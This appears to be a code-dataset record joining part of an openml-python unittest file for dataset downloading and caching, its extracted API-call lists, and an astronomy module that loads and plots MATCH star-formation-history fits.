self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "qualities.xml")))
self.assertGreater(len(dataset.features), 1)
self.assertGreater(len(dataset.qualities), 4)
def test_get_dataset_with_string(self):
dataset = openml.datasets.get_dataset(101)
self.assertRaises(PyOpenMLError, dataset._get_arff, 'arff')
self.assertRaises(PyOpenMLError, dataset.get_data)
def test_get_dataset_sparse(self):
dataset = openml.datasets.get_dataset(102)
X = dataset.get_data()
self.assertIsInstance(X, scipy.sparse.csr_matrix)
def test_download_rowid(self):
# Smoke test which checks that the dataset has the row-id set correctly
did = 44
dataset = openml.datasets.get_dataset(did)
self.assertEqual(dataset.row_id_attribute, 'Counter')
def test__get_dataset_description(self):
description = _get_dataset_description(self.workdir, 2)
self.assertIsInstance(description, dict)
description_xml_path = os.path.join(self.workdir,
'description.xml')
self.assertTrue(os.path.exists(description_xml_path))
def test__getarff_path_dataset_arff(self):
openml.config.set_cache_directory(self.static_cache_dir)
description = openml.datasets.functions._get_cached_dataset_description(2)
arff_path = _get_dataset_arff(self.workdir, description)
self.assertIsInstance(arff_path, str)
self.assertTrue(os.path.exists(arff_path))
def test__getarff_md5_issue(self):
description = {
'oml:id': 5,
'oml:md5_checksum': 'abc',
'oml:url': 'https://www.openml.org/data/download/61',
}
self.assertRaisesRegexp(
ValueError,
'Checksum ad484452702105cbf3d30f8deaba39a9 of downloaded dataset 5 '
'is unequal to the checksum abc sent by the server.',
_get_dataset_arff,
self.workdir, description,
)
def test__get_dataset_features(self):
features = _get_dataset_features(self.workdir, 2)
self.assertIsInstance(features, dict)
features_xml_path = os.path.join(self.workdir, 'features.xml')
self.assertTrue(os.path.exists(features_xml_path))
def test__get_dataset_qualities(self):
# Only a smoke check
qualities = _get_dataset_qualities(self.workdir, 2)
self.assertIsInstance(qualities, list)
def test_deletion_of_cache_dir(self):
# Simple removal
        did_cache_dir = openml.datasets.functions._create_dataset_cache_directory(1)
self.assertTrue(os.path.exists(did_cache_dir))
openml.datasets.functions._remove_dataset_cache_dir(did_cache_dir)
self.assertFalse(os.path.exists(did_cache_dir))
# Use _get_dataset_arff to load the description, trigger an exception in the
# test target and have a slightly higher coverage
@mock.patch('openml.datasets.functions._get_dataset_arff')
def test_deletion_of_cache_dir_faulty_download(self, patch):
patch.side_effect = Exception('Boom!')
self.assertRaisesRegexp(Exception, 'Boom!', openml.datasets.get_dataset,
1)
datasets_cache_dir = os.path.join(self.workdir, 'datasets')
self.assertEqual(len(os.listdir(datasets_cache_dir)), 0)
def test_publish_dataset(self):
dataset = openml.datasets.get_dataset(3)
file_path = os.path.join(openml.config.get_cache_directory(),
"datasets", "3", "dataset.arff")
dataset = OpenMLDataset(
name="anneal", version=1, description="test",
format="ARFF", licence="public", default_target_attribute="class", data_file=file_path)
dataset.publish()
self.assertIsInstance(dataset.dataset_id, int)
def test__retrieve_class_labels(self):
openml.config.set_cache_directory(self.static_cache_dir)
labels = openml.datasets.get_dataset(2).retrieve_class_labels()
self.assertEqual(labels, ['1', '2', '3', '4', '5', 'U'])
labels = openml.datasets.get_dataset(2).retrieve_class_labels(
target_name='product-type')
self.assertEqual(labels, ['C', 'H', 'G'])
def test_upload_dataset_with_url(self):
dataset = OpenMLDataset(
name="UploadTestWithURL", version=1, description="test",
format="ARFF",
url="https://www.openml.org/data/download/61/dataset_61_iris.arff")
dataset.publish()
self.assertIsInstance(dataset.dataset_id, int)
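# A minimal sketch of the public flow the tests above exercise, assuming
# network access to openml.org (dataset id 1 is 'anneal' per the tests):
# import openml
# dataset = openml.datasets.get_dataset(1)
# print(dataset.name, len(dataset.features))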
|
[
"openml.datasets.functions._get_cached_datasets",
"os.remove",
"openml.datasets.list_datasets",
"openml.config.set_cache_directory",
"os.path.join",
"openml.datasets.functions._create_dataset_cache_directory",
"openml.datasets.functions._get_cached_dataset",
"os.path.exists",
"openml.OpenMLDataset",
"openml.datasets.get_dataset",
"openml.datasets.functions._get_cached_dataset_features",
"openml.datasets.get_datasets",
"openml.datasets.functions._get_dataset_features",
"openml.datasets.functions._get_dataset_arff",
"mock.patch",
"openml.datasets.functions._list_cached_datasets",
"openml.datasets.functions._get_dataset_qualities",
"openml.datasets.check_datasets_active",
"os.listdir",
"openml.datasets.functions._remove_dataset_cache_dir",
"openml.datasets.functions._get_cached_dataset_description",
"unittest.skip",
"openml.datasets.functions._get_dataset_description",
"openml.config.get_cache_directory",
"openml.datasets.functions._get_cached_dataset_qualities",
"openml.datasets.functions._get_cached_dataset_arff"
] |
[((2007, 2068), 'mock.patch', 'mock.patch', (['"""openml.datasets.functions._list_cached_datasets"""'], {}), "('openml.datasets.functions._list_cached_datasets')\n", (2017, 2068), False, 'import mock\n'), ((5237, 5308), 'unittest.skip', 'unittest.skip', (['"""See https://github.com/openml/openml-python/issues/149"""'], {}), "('See https://github.com/openml/openml-python/issues/149')\n", (5250, 5308), False, 'import unittest\n'), ((10599, 10656), 'mock.patch', 'mock.patch', (['"""openml.datasets.functions._get_dataset_arff"""'], {}), "('openml.datasets.functions._get_dataset_arff')\n", (10609, 10656), False, 'import mock\n'), ((1710, 1766), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (1743, 1766), False, 'import openml\n'), ((1793, 1842), 'openml.datasets.functions._list_cached_datasets', 'openml.datasets.functions._list_cached_datasets', ([], {}), '()\n', (1840, 1842), False, 'import openml\n'), ((2146, 2202), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (2179, 2202), False, 'import openml\n'), ((2280, 2302), 'openml.datasets.functions._get_cached_datasets', '_get_cached_datasets', ([], {}), '()\n', (2300, 2302), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((2516, 2572), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (2549, 2572), False, 'import openml\n'), ((2591, 2613), 'openml.datasets.functions._get_cached_dataset', '_get_cached_dataset', (['(2)'], {}), '(2)\n', (2610, 2613), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((2633, 2664), 'openml.datasets.functions._get_cached_dataset_features', '_get_cached_dataset_features', (['(2)'], {}), '(2)\n', (2661, 2664), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((2685, 2717), 'openml.datasets.functions._get_cached_dataset_qualities', '_get_cached_dataset_qualities', (['(2)'], {}), '(2)\n', (2714, 2717), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((3028, 3084), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (3061, 3084), False, 'import openml\n'), ((3107, 3167), 'openml.datasets.functions._get_cached_dataset_description', 'openml.datasets.functions._get_cached_dataset_description', (['(2)'], {}), '(2)\n', (3164, 3167), False, 'import openml\n'), ((3288, 3344), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (3321, 3344), False, 'import openml\n'), ((3686, 3742), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (3719, 3742), False, 'import openml\n'), ((3765, 3829), 'openml.datasets.functions._get_cached_dataset_arff', 'openml.datasets.functions._get_cached_dataset_arff', ([], {'dataset_id': '(2)'}), '(dataset_id=2)\n', (3815, 3829), False, 'import openml\n'), ((3955, 4011), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (3988, 4011), False, 'import openml\n'), ((4448, 4479), 'openml.datasets.list_datasets', 'openml.datasets.list_datasets', ([], {}), '()\n', (4477, 4479), False, 'import openml\n'), ((4724, 4769), 'openml.datasets.list_datasets', 'openml.datasets.list_datasets', ([], {'tag': '"""study_14"""'}), "(tag='study_14')\n", (4753, 4769), False, 'import openml\n'), ((5368, 5414), 'openml.datasets.check_datasets_active', 'openml.datasets.check_datasets_active', (['[1, 17]'], {}), '([1, 17])\n', (5405, 5414), False, 'import openml\n'), ((5783, 5817), 'openml.datasets.get_datasets', 'openml.datasets.get_datasets', (['dids'], {}), '(dids)\n', (5811, 5817), False, 'import openml\n'), ((7016, 7046), 'openml.datasets.get_dataset', 'openml.datasets.get_dataset', (['(1)'], {}), '(1)\n', (7043, 7046), False, 'import openml\n'), ((7874, 7906), 'openml.datasets.get_dataset', 'openml.datasets.get_dataset', (['(101)'], {}), '(101)\n', (7901, 7906), False, 'import openml\n'), ((8092, 8124), 'openml.datasets.get_dataset', 'openml.datasets.get_dataset', (['(102)'], {}), '(102)\n', (8119, 8124), False, 'import openml\n'), ((8365, 8397), 'openml.datasets.get_dataset', 'openml.datasets.get_dataset', (['did'], {}), '(did)\n', (8392, 8397), False, 'import openml\n'), ((8528, 8569), 'openml.datasets.functions._get_dataset_description', '_get_dataset_description', (['self.workdir', '(2)'], {}), '(self.workdir, 2)\n', (8552, 8569), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((8650, 8695), 'os.path.join', 'os.path.join', (['self.workdir', '"""description.xml"""'], {}), "(self.workdir, 'description.xml')\n", (8662, 8695), False, 'import os\n'), ((8858, 8914), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (8891, 8914), False, 'import openml\n'), ((8937, 8997), 'openml.datasets.functions._get_cached_dataset_description', 'openml.datasets.functions._get_cached_dataset_description', (['(2)'], {}), '(2)\n', (8994, 8997), False, 'import openml\n'), ((9018, 9062), 'openml.datasets.functions._get_dataset_arff', '_get_dataset_arff', (['self.workdir', 'description'], {}), '(self.workdir, description)\n', (9035, 9062), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((9710, 9748), 'openml.datasets.functions._get_dataset_features', '_get_dataset_features', (['self.workdir', '(2)'], {}), '(self.workdir, 2)\n', (9731, 9748), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((9823, 9865), 'os.path.join', 'os.path.join', (['self.workdir', '"""features.xml"""'], {}), "(self.workdir, 'features.xml')\n", (9835, 9865), False, 'import os\n'), ((10018, 10057), 'openml.datasets.functions._get_dataset_qualities', '_get_dataset_qualities', (['self.workdir', '(2)'], {}), '(self.workdir, 2)\n', (10040, 10057), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((10197, 10257), 'openml.datasets.functions._create_dataset_cache_directory', 'openml.datasets.functions._create_dataset_cache_directory', (['(1)'], {}), '(1)\n', (10254, 10257), False, 'import openml\n'), ((10335, 10401), 'openml.datasets.functions._remove_dataset_cache_dir', 'openml.datasets.functions._remove_dataset_cache_dir', (['did_cache_dir'], {}), '(did_cache_dir)\n', (10386, 10401), False, 'import openml\n'), ((10914, 10952), 'os.path.join', 'os.path.join', (['self.workdir', '"""datasets"""'], {}), "(self.workdir, 'datasets')\n", (10926, 10952), False, 'import os\n'), ((11073, 11103), 'openml.datasets.get_dataset', 'openml.datasets.get_dataset', (['(3)'], {}), '(3)\n', (11100, 11103), False, 'import openml\n'), ((11258, 11409), 'openml.OpenMLDataset', 'OpenMLDataset', ([], {'name': '"""anneal"""', 'version': '(1)', 'description': '"""test"""', 'format': '"""ARFF"""', 'licence': '"""public"""', 'default_target_attribute': '"""class"""', 'data_file': 'file_path'}), "(name='anneal', version=1, description='test', format='ARFF',\n licence='public', default_target_attribute='class', data_file=file_path)\n", (11271, 11409), False, 'from openml import OpenMLDataset\n'), ((11564, 11620), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (11597, 11620), False, 'import openml\n'), ((11982, 12144), 'openml.OpenMLDataset', 'OpenMLDataset', ([], {'name': '"""UploadTestWithURL"""', 'version': '(1)', 'description': '"""test"""', 'format': '"""ARFF"""', 'url': '"""https://www.openml.org/data/download/61/dataset_61_iris.arff"""'}), "(name='UploadTestWithURL', version=1, description='test',\n format='ARFF', url=\n 'https://www.openml.org/data/download/61/dataset_61_iris.arff')\n", (11995, 12144), False, 'from openml import OpenMLDataset\n'), ((5039, 5089), 'openml.datasets.list_datasets', 'openml.datasets.list_datasets', ([], {'offset': 'i', 'size': 'size'}), '(offset=i, size=size)\n', (5068, 5089), False, 'import openml\n'), ((8764, 8800), 'os.path.exists', 'os.path.exists', (['description_xml_path'], {}), '(description_xml_path)\n', (8778, 8800), False, 'import os\n'), ((9133, 9158), 'os.path.exists', 'os.path.exists', (['arff_path'], {}), '(arff_path)\n', (9147, 9158), False, 'import os\n'), ((9890, 9923), 'os.path.exists', 'os.path.exists', (['features_xml_path'], {}), '(features_xml_path)\n', (9904, 9923), False, 'import os\n'), ((10296, 10325), 'os.path.exists', 'os.path.exists', (['did_cache_dir'], {}), '(did_cache_dir)\n', (10310, 10325), False, 'import os\n'), ((10427, 10456), 'os.path.exists', 'os.path.exists', (['did_cache_dir'], {}), '(did_cache_dir)\n', (10441, 10456), False, 'import os\n'), ((11137, 11172), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (11170, 11172), False, 'import openml\n'), ((1447, 1502), 'os.path.join', 'os.path.join', (['cache_dir', '"""datasets"""', 'did', '"""dataset.pkl"""'], {}), "(cache_dir, 'datasets', did, 'dataset.pkl')\n", (1459, 1502), False, 'import os\n'), ((10982, 11012), 'os.listdir', 'os.listdir', (['datasets_cache_dir'], {}), '(datasets_cache_dir)\n', (10992, 11012), False, 'import os\n'), ((11638, 11668), 'openml.datasets.get_dataset', 'openml.datasets.get_dataset', (['(2)'], {}), '(2)\n', (11665, 11668), False, 'import openml\n'), ((11775, 11805), 'openml.datasets.get_dataset', 'openml.datasets.get_dataset', (['(2)'], {}), '(2)\n', (11802, 11805), False, 'import openml\n'), ((1587, 1609), 'os.remove', 'os.remove', (['pickle_path'], {}), '(pickle_path)\n', (1596, 1609), False, 'import os\n'), ((5926, 5961), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (5959, 5961), False, 'import openml\n'), ((6066, 6101), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (6099, 6101), False, 'import openml\n'), ((6206, 6241), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (6239, 6241), False, 'import openml\n'), ((6343, 6378), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (6376, 6378), False, 'import openml\n'), ((6480, 6515), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (6513, 6515), False, 'import openml\n'), ((6617, 6652), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (6650, 6652), False, 'import openml\n'), ((6754, 6789), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (6787, 6789), False, 'import openml\n'), ((6892, 6927), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (6925, 6927), False, 'import openml\n'), ((7216, 7251), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (7249, 7251), False, 'import openml\n'), ((7356, 7391), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (7389, 7391), False, 'import openml\n'), ((7493, 7528), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (7526, 7528), False, 'import openml\n'), ((7630, 7665), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (7663, 7665), False, 'import openml\n'), ((1355, 1390), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (1388, 1390), False, 'import openml\n')]
|
from __future__ import print_function
import argparse
import logging
import sys
import os
import numpy as np
import matplotlib.pyplot as plt
from .config import EXT
from .fileio import read_binned_sfh
from .utils import convertz, parse_pipeline, float2sci
logger = logging.getLogger()
def mh2z(num):
return 0.02 * 10 ** num
def quadriture(x):
return np.sqrt(np.sum(x * x))
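# The two helpers above encode small formulas used throughout this module:
# mh2z converts a metallicity [M/H] into a mass fraction Z assuming
# Z_sun = 0.02 (Z = 0.02 * 10 ** [M/H]), and quadriture combines an array of
# uncertainties in quadrature (the square root of the sum of squares).
# A minimal illustration (values invented for demonstration only):
#     mh2z(0.0)                        # -> 0.02 (solar)
#     quadriture(np.array([3., 4.]))   # -> 5.0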
class SFH(object):
'''
    Load the MATCH SFH solution as a class with attributes set by the
    best fits from the SFH file.
'''
def __init__(self, filename, hmc_file=None, meta_file=None):
"""
Parameters
----------
filename : str
data file
hmc_file : str
data file from which to overwite uncertainties
meta_file : str
data file to only read bestfit line.
"""
self.base, self.name = os.path.split(filename)
self.data = read_binned_sfh(filename, hmc_file)
if meta_file is None:
meta_file = filename
self.load_match_header(meta_file)
def load_match_header(self, filename):
'''
assumes header is from line 0 to 6 and sets footer to be the final
line of the file
header formatting is important:
Line # format requirement
first Ends with "= %f (%s)"
N is the string "Best fit:\n"
N+1 has ',' separated strings of "%s=%f+%f-%f"
last is formatted "%s %f %f %f"
'''
def set_value_err_attr(key, attr, pattr, mattr):
'''
set attributes [key], [key]_perr, [key]_merr
to attr, pattr, mattr (must be floats)
'''
self.__setattr__(key, float(attr))
self.__setattr__(key + '_perr', float(pattr))
self.__setattr__(key + '_merr', float(mattr))
with open(filename, 'r') as infile:
lines = infile.readlines()
if len(lines) == 0:
print('empty file: %s' % filename)
self.header = []
self.footer = []
self.bestfit = np.nan
self.match_out = ''
self.data = np.array([])
return
self.header = lines[0:6]
self.footer = lines[-1]
try:
bestfit, fout = \
self.header[0].replace(' ', '').split('=')[1].split('(')
self.bestfit = float(bestfit)
self.match_out = fout.split(')')[0]
try:
iline = self.header.index('Best fit:\n') + 1
except ValueError:
print('Need Best fit line to assign attributes')
raise ValueError
line = self.header[iline].strip().replace(' ', '').split(',')
for i in line:
key, attrs = i.split('=')
attr, pmattr = attrs.split('+')
pattr, mattr = pmattr.split('-')
set_value_err_attr(key, attr, pattr, mattr)
# the final line has totalSF
key, attr, pattr, mattr = self.header[-1].strip().split()
set_value_err_attr(key, attr, pattr, mattr)
        except Exception:
# zcmerge files: the first line has totalSF
self.header = lines[0]
self.footer = ['']
try:
key, attr, pattr, mattr = self.header.strip().split()
set_value_err_attr(key, attr, pattr, mattr)
            except Exception:
# no header
pass
self.flag = None
        if np.sum(np.diff(self.data.mh)) == 0:
            self.flag = 'setz'
        # np.diff has one element fewer than mh, so compare against len - 1
        elif len(np.nonzero(np.diff(self.data.mh) >= 0)[0]) == len(self.data.mh) - 1:
            self.flag = 'zinc'
return
def mh2z(self, num):
"""nore really [M/H] """
return 0.02 * 10 ** num
def plot_bins(self, val='sfr', err=False, convertz=False, offset=1.):
'''make SFH bins for plotting'''
if isinstance(val, str):
if err:
valm = self.data['%s_errm' % val] * offset
valp = self.data['%s_errp' % val] * offset
val = self.data[val] * offset
if convertz:
val = mh2z(val)
if err:
valm = mh2z(valm)
valp = mh2z(valp)
lagei = self.data.lagei
lagef = self.data.lagef
# double up value
# lagei_i, lagef_i, lagei_i+1, lagef_i+1 ...
lages = np.ravel([(lagei[i], lagef[i]) for i in range(len(lagei))])
vals = np.ravel([(val[i], val[i]) for i in range(len(val))])
if err:
valm = np.ravel([(valm[i], valm[i]) for i in range(len(val))])
valp = np.ravel([(valp[i], valp[i]) for i in range(len(val))])
data = (vals, valm, valp)
else:
data = vals
return lages, data
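    # plot_bins duplicates every bin edge and value so the SFH can be drawn
    # as a step function: bins [t0, t1], [t1, t2] with values v0, v1 become
    # ages (t0, t1, t1, t2) and values (v0, v0, v1, v1). A hypothetical
    # two-bin example (numbers invented for illustration):
    #     lagei = [6.6, 7.0], lagef = [7.0, 7.4], sfr = [1e-3, 2e-3]
    #     -> lages = [6.6, 7.0, 7.0, 7.4], vals = [1e-3, 1e-3, 2e-3, 2e-3]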
def age_plot(self, val='sfr', ax=None, plt_kw={}, errors=True,
convertz=False, xlabel=None, ylabel=None,
sfr_offset=1e3):
plt_kw = dict({'lw': 3, 'color': 'black'}, **plt_kw)
eplt_kw = plt_kw.copy()
eplt_kw.update({'linestyle': 'None'})
lages, sfrs = self.plot_bins(offset=sfr_offset)
rlages, (rsfrs, sfr_merrs, sfr_perrs) = \
self.plot_bins(err=True, offset=sfr_offset)
rlages = np.append(self.data['lagei'], self.data['lagef'][-1])
rlages = rlages[:-1] + np.diff(rlages) / 2.
rsfrs = self.data['sfr'] * sfr_offset
rsfr_merrs = self.data['sfr_errm'] * sfr_offset
rsfr_perrs = self.data['sfr_errp'] * sfr_offset
lages = 10 ** (lages - 9.)
rlages = 10 ** (rlages - 9.)
if val != 'sfr':
lages, vals = self.plot_bins(val=val, convertz=convertz)
# mask values with no SF
isfr, = np.nonzero(sfrs == 0)
vals[isfr] = np.nan
if self.flag != 'setz':
rlages, (rvals, val_merrs, val_perrs) = \
self.plot_bins(val=val, err=True)
# mask values with no SF
irsfr, = np.nonzero(rsfrs == 0)
val_merrs[irsfr] = 0.
val_perrs[irsfr] = 0.
if np.sum(val_merrs) == 0 or np.sum(val_perrs) == 0:
errors = False
else:
errors = False
if 'mh' in val:
if ylabel is not None:
ylabel = r'$\rm{[M/H]}$'
if convertz:
ylabel = r'$Z$'
else:
ylabel = r'$SFR\ %s\ (\rm{M_\odot/yr})$' % \
float2sci(1. / sfr_offset).replace('$', '')
vals = sfrs
rvals = rsfrs
val_merrs = rsfr_merrs
val_perrs = rsfr_perrs
if ax is None:
_, ax = plt.subplots()
xlabel = r'$\log Age\ \rm{(yr)}$'
ax.plot(lages, vals, **plt_kw)
if errors:
ax.errorbar(rlages, rvals, yerr=[val_merrs, val_perrs], **eplt_kw)
if xlabel is not None:
ax.set_xlabel(xlabel, fontsize=20)
if ylabel is not None:
ax.set_ylabel(ylabel, fontsize=20)
return ax
def plot_csfr(self, ax=None, errors=True, plt_kw={}, fill_between_kw={},
xlim=None, ylim=(-0.01, 1.01), data=True):
'''cumulative sfr plot from match'''
one_off = False
if ax is None:
fig, ax = plt.subplots(figsize=(8, 8))
plt.subplots_adjust(right=0.95, left=0.1, bottom=0.1, top=0.95)
ax.tick_params(direction='in')
one_off = True
fill_between_kw = dict({'alpha': 1, 'color': 'gray'},
**fill_between_kw)
plt_kw = dict({'lw': 3}, **plt_kw)
# lages, (csfh, csfh_errm, csfh_errp) = self.plot_bins(val='csfr',
# err=True)
lages = self.data['lagei']
csfh = self.data['csfr']
csfh_errm = self.data['csfr_errm']
csfh_errp = self.data['csfr_errp']
age = 10 ** (lages - 9.)
# age = lages
age = np.append(age, 10 ** (self.data['lagef'][-1] - 9))
csfh = np.append(csfh, 0)
csfh_errm = np.append(csfh_errm, 0)
csfh_errp = np.append(csfh_errp, 0)
if errors:
ax.fill_between(age, csfh - csfh_errm, csfh + csfh_errp,
**fill_between_kw)
if data:
ax.plot(age, csfh, **plt_kw)
if xlim is not None:
ax.set_xlim(xlim)
ax.set_ylim(ylim)
# ax.set_xscale('log')
# ax.xaxis.set_major_locator(LogNLocator)
if one_off:
ax.set_xlabel('$\\rm{Star\ Formation\ Time\ (Gyr)}$', fontsize=20)
            ax.set_ylabel('$\\rm{Cumulative\ Star\ Formation}$', fontsize=20)
plt.legend(loc=0, frameon=False)
if 'label' in plt_kw.keys():
                outfile = \
                    '{}_csfr{}'.format(plt_kw['label'].replace('$', '').lower(),
                                       EXT)
else:
outfile = \
'{}_csfr{}'.format(os.path.join(self.base, self.name), EXT)
plt.savefig(outfile)
print('wrote {}'.format(outfile))
return ax
def sf_weighted_metallicity(self):
agebins = (10 ** self.data.lagef - 10 ** self.data.lagei)
totalsf = np.sum(self.data.sfr * agebins)
fracsf = (self.data.sfr * agebins) / totalsf
feh = np.array([convertz(z=0.02 * 10 ** m)[-2] for m in self.data.mh])
return np.sum(fracsf * feh)
def param_table(self, angst=True, agesplit=[1e9, 3e9], target='',
filters=['', '']):
try:
dic = {'bestfit': self.bestfit, 'Av': self.Av, 'dmod': self.dmod}
        except Exception:
print('No bestfit info')
dic = {'bestfit': np.nan, 'Av': np.nan, 'dmod': np.nan}
dic['header'] = \
(r'Galaxy & Optical Filters & A$_V$ & $(m\!-\!M)_0$ &'
r'$\% \frac{{\rm{{SF}}}}{{\rm{{SF_{{TOT}}}}}}$ &'
r'$\langle \mbox{{[Fe/H]}} \rangle$ &'
r'$\% \frac{{\rm{{SF}}}}{{\rm{{SF_{{TOT}}}}}}$ &'
r'$\langle \mbox{{[Fe/H]}} \rangle$ & $bestfit$ \\ & & & & '
r'\multicolumn{{2}}{{c}}{{$<{0}\rm{{Gyr}}$}} & '
r'\multicolumn{{2}}{{c}}{{${0}-{1}\rm{{Gyr}}$}} & \\ \hline'
'\n'.format(*agesplit))
dic['target'] = target
if angst:
try:
dic['target'], filters = parse_pipeline(self.name)
            except Exception:
pass
dic['filters'] = ','.join(filters)
fyng, fyng_errp, fyng_errm = self.mass_fraction(0, agesplit[0])
fint, fint_errp, fint_errm = self.mass_fraction(agesplit[0],
agesplit[1])
# logZ = 0 if there is no SF, that will add error to mean Fe/H
iyng = self.nearest_age(agesplit[0], i=False)
iint = self.nearest_age(agesplit[1], i=False)
iyngs, = np.nonzero(self.data.mh[:iyng + 1] != 0)
iints, = np.nonzero(self.data.mh[:iint + 1] != 0)
iints = list(set(iints) - set(iyngs))
feh_yng = convertz(z=mh2z(np.mean(self.data.mh[iyngs])))[-2]
feh_int = convertz(z=mh2z(np.mean(self.data.mh[iints])))[-2]
feh_yng_errp = \
convertz(z=mh2z(quadriture(self.data.mh_errp[iyngs])))[-2]
feh_yng_errm = \
convertz(z=mh2z(quadriture(self.data.mh_errm[iyngs])))[-2]
feh_int_errp = \
convertz(z=mh2z(quadriture(self.data.mh_errp[iints])))[-2]
feh_int_errm = \
convertz(z=mh2z(quadriture(self.data.mh_errm[iints])))[-2]
maf = '${0: .2f}^{{+{1: .2f}}}_{{-{2: .2f}}}$'
dic['fyng'], dic['fint'] = \
[maf.format(v, p, m) for v, p, m in zip([fyng, fint],
[fyng_errp, fint_errp],
[fyng_errm, fint_errm])]
dic['feh_yng'], dic['feh_int'] = \
[maf.format(v, p, m) for v, p, m in
zip([feh_yng, feh_int],
[feh_yng_errp, feh_int_errp],
[feh_yng_errm, feh_int_errm])]
line = ['{target}', '{filters}', '{Av: .2f}', '{dmod: .2f}',
'{fyng}', '{feh_yng}', '{fint}', '{feh_int}']
dic['fmt'] = '%s \\\\ \n' % (' & '.join(line))
return dic
def nearest_age(self, lage, i=True):
if lage > 10.15:
lage = np.log10(lage)
logger.warning('converting input age to log age')
age_arr = self.data.lagef
msg = 'lagef'
if i:
age_arr = self.data.lagei
msg = 'lagei'
        # minimum age bin size; a warning is triggered if the requested age
        # differs from the nearest bin edge by more than this tolerance.
tol = np.min(np.diff(age_arr))
# find closest age bin to lage
idx = np.argmin(np.abs(age_arr - lage))
difi = np.abs(age_arr[idx] - lage)
if difi > tol:
            logger.warning('input {}={} not found. '
                           'Using {}'.format(msg, lage, age_arr[idx]))
return idx
def mass_fraction(self, lagei, lagef):
"""
Return the fraction of total mass formed between lagei and lagef.
lage[] units can be log yr or yr.
Multiply by self.totalSF to obtain the mass formed.
"""
agebins = (10 ** self.data.lagef - 10 ** self.data.lagei)
if lagef-lagei < np.min(np.diff(self.data.lagei)):
logger.error('Age difference smaller than bin sizes (or negative)')
return 0, 0, 0
# higher precision than self.totalSF
totalsf = np.sum(self.data.sfr * agebins)
idxi = self.nearest_age(lagei)
# +1 is to include final bin
idxf = self.nearest_age(lagef, i=False) + 1
fracsfr = np.sum(self.data.sfr[idxi:idxf] *
agebins[idxi:idxf]) / totalsf
fracsfr_errp = quadriture(self.data.sfr_errp[idxi:idxf] *
agebins[idxi:idxf]) / totalsf
fracsfr_errm = quadriture(self.data.sfr_errm[idxi:idxf] *
agebins[idxi:idxf]) / totalsf
return fracsfr, fracsfr_errp, fracsfr_errm
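    # mass_fraction integrates the SFR over linear-age bin widths, so the
    # returned fraction is sum(sfr_i * dt_i) over the requested bins divided
    # by the total, with the per-bin uncertainties combined in quadrature.
    # A hedged usage sketch (instance name invented for illustration):
    #     frac, errp, errm = msfh.mass_fraction(0, 1e9)  # SF in the last Gyr
    #     mass_formed = frac * msfh.totalSF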
def sfh_plot(self):
from matplotlib.ticker import NullFormatter
_, (ax1, ax2) = plt.subplots(nrows=2)
self.age_plot(ax=ax1)
self.age_plot(val='mh', convertz=False, ax=ax2)
ax1.xaxis.set_major_formatter(NullFormatter())
